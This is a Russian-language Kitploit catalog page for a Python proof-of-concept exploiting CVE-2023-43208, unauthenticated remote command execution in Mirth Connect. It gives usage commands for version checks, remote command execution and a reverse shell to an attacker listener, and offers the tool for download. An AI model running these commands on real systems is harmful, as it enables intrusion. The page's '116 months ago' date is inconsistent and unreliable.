Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43208-PoC — Python-скрипт для подтверждения концепции, демонстрирующий CVE‑2023‑43208 в Mirth Connect, позволяющий проверять версии и выполнять команды на уязвимых экземплярах. | Kitploit
Инструменты/GitHubGitHub/criz117/cve-2023-43208-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

Python-скрипт для подтверждения концепции, демонстрирующий CVE‑2023‑43208 в Mirth Connect, позволяющий проверять версии и выполнять команды на уязвимых экземплярах.

Репозиторий
116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43208 - Mirth Connect Неавторизованное удаленное выполнение команд

Требования

  • Python 3.11 или выше (протестировано на 3.11, 3.12, 3.13)

Установка

# Создаем чистое виртуальное окружение
python3 -m venv .venv
source .venv/bin/activate

# Устанавливаем зафиксированные зависимости
pip install -r requirements.txt

Использование

# Только проверка версии
python3 CVE-2023-43208.py -u https://TARGET/ --check

# Выполнение одной команды
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# Обратная оболочка (сначала запустите nc слушатель)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

Примечания

  • Ответ 500 от сервера является нормальным и ожидаемым — команда все равно выполняется
  • Затрагивает Mirth Connect версии ниже 4.4.1

Отказ от ответственности

Эта proof‑of‑concept предоставляется только для исследовательских и образовательных целей. Не используйте ее против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим кодом.

Скачать инструмент